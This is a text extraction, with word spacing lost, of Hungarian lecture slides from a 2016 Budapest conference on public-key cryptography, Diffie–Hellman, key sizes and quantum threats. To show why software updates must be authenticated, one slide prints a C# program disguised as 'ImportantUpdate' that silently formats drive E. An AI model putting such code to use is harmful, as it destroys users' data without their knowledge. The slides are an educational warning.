MiértbiztonságosazInternet?40évesanyíltkulcsúkriptográfia

PethőAttilaEgyetemitanár,DebreceniEgyetem3.MagyarJövőInternetKonferencia

Jövőinternettrendek:Smart CityacélkeresztbenBudapest,2016.november10.

Anyilvánoskulcsútitkosításfelfedezői

Whitfield DiffieMartinE.Hellman

NewDirections in Cryptography,IEEETrans on Inform.Theory,November1976

40évvelezelőttírták

• […]applications create aneedfornewtypesofcryptographicsystemswhich minimizethenecessityofsecurekeydistributionchannels andsupplytheequivalentofawrittensignature.• Thedevelopmentofcomputercontrolledcommunication networkspromiseeffortlessandinexpensivecontact betweenpeopleorcomputersonoppositesidesofthe world,replacingmostmailandmanyexcursionswith telecommunications.• Máraezmegvalósult!Kialakultéshatékonyanműködikaglobálisnyíltkulcsúinfrastruktúra.

Biztonságiparadoxon

• AzInternetegyóriásinyilvános hálózat,amelyhezmindenkicsatlakozhat.•Megkelloldania• Felhasználókazonosítását,• Adokumentumokhitelességénekazellenőrzését,• Kulcscserét ésabizalmasdokumentumoktitkosítását.

Azonosítás

• Annakbizonyítása,hogyafelhasználóaz,akinekmondjamagát.• Bizonyíték=azonosító:egyedi,bizalmasadat,deanyilvánosInternetenküldjük.• Embereknéllehetségesabiometrikus azonosítás.• Szoftvereknél,kütyüknél,dnónoknál csakjelszó!?• Hogyanazonosítjákmajdmagukatananoérzékelők ésnanorobotok?• Rendelhet-ehűtőszekrényparizertPethőúrnak?

Hitelesség

• Adokumentumnemváltozott/változtattákmegazátvitelsorán.• AzInternetfejlődéseszempontjábólkulcsfontosságú,hogyazújszoftvereketésszoftverfrissítésekethitelesenjuttassákelafelhasználóknak.Pozitívvisszacsatolás.• Járművekszoftverfrissítéseàműhelyekben.Lassúésköltséges.

Frissítés1

Frissítés2

Frissítés3

Frissítés4

Frissítés4

• A2048bitkulcsméretajánlás20éves!

• Amérnökökpesszimistábbakvoltak,mintamatematikusok.

• Alegnagyobbfaktorizált számok:1994:256bit1999:512bit2009:768bit2016:változatlan

Miértkellezacécó?

Mertpl.egyegyszerűkóddallelehettörölnialemezektartalmát!

using System;using System.Collections.Generic;using System.Linq;using System.Text;

namespace ImportantUpdate{class Run{public static void Main(String[]args){

FormatDrive('E');}public static void FormatDrive(

char driveLetter,string fileSystem ="NTFS",bool quickFormat =true)

{string drive=driveLetter +":";vardi=new System.IO.DriveInfo(drive);

varprocess =new System.Diagnostics.ProcessStartInfo();process.FileName ="format.com";process.WorkingDirectory =Environment.SystemDirectory;process.Arguments =

"/FS:"+fileSystem +"/Y"+(quickFormat ?"/Q":"")+""+drive;

process.UseShellExecute =false;process.CreateNoWindow =true;varformatProcess =System.Diagnostics.Process.Start(process);

}}

}

Titkosítás

• Látszólagsosehasználjuk.• Gyakranfolytatunkbizalmasüzenetváltást:• Bankitranzakciók• Egészségiállapotravonatkozóadatok• Számlák,adóbevallás,stb.

• Atitkosításaháttérbentörténik.• Veszélyeseszközpl.aterroristákkezében.

Merrefejlődikakriptográfia?

• Nagyonrossztapasztalatokazoktatásban!• Amahasználtnyíltkulcsúkriptográfiaialgoritmusok– RSA,ECC– feltörhetőekkvantumalgoritmussal(Shor,1994).• AlegnagyobbShor algoritmussaltényezőkrebontottszám:15.• Léteznekkvantum-rezisztensnyíltkulcsúkriptográfiaialgoritmusok,deakulcsaikéserőforrásigényükisnagyok.• AzIoT pehelykönnyűalgoritmusokatisigényel!